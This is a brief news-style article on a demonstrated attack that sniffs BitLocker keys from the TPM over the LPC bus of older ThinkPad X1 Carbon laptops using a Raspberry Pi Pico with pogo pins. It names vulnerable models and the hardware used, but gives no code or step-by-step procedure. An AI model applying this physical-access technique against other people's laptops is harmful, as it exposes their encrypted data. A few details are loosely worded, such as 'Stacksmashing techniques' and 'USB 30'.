While the strong security of BitLocker keys is comforting, an experiment proved that an attacker can steal your key in just 43 seconds and at less than $10 in hardware costs. BitLocker is a well-respected encryption tool in Windows systems and has been a built-in feature of Windows since the Vista version. Microsoft has claimed that cracking BitLocker requires an attacker to be highly skilled and able to access the target hardware for a long time, but a recent attack experiment against BitLocker has shocked people. 
In this experiment, an attacker tried to crack BitLocker using Stacksmashing techniques, and the results were staggering. BitLocker is no stranger to Windows users. It has the ability to run silently in the background, encrypt data for your hard drive, and decrypt it on demand when needed. However, the crux of the matter lies in the storage of keys. In simple terms, the encryption key is stored in a Trusted Platform Module (TPM). When the computer boots up, it reads the key from the TPM via the LPC (low pin count) bus. The LPC bus is one of the last remnants of the original ISA bus. This way keys are stored seems to pose a risk to BitLocker's security.
The problem is that when the key is passed over the LPC bus, it can be sniffed. Some laptops, especially those with connectors and test points directly on the LPC, provide an opportunity for attackers. [Stacksmashing] cleverly leverages the layout features of the older Lenovo ThinkPad (1st or 2nd Gen X1 Carbon). These laptops are designed in such a way that once the back cover is removed, Lenovo leaves an uninstalled connector footprint on the motherboard, which is the key to stealing the keys. [Stacksmashing] used the Raspberry Pi Pico on the carrier board of its design. The pogo pins at the end of the carrier board make it easy to probe the LPC bus, which means that an attacker can easily sniff the keys this way.
Of course, it's important to point out that despite stealing the key, the attackers can't directly access the data on the drive. The attacker would have to take the entire drive or spend extra time transferring data over the USB interface. However, considering that the X1 Carbon is a 10-year-old laptop, it has at least USB 30 interface, which provides some convenience for attackers.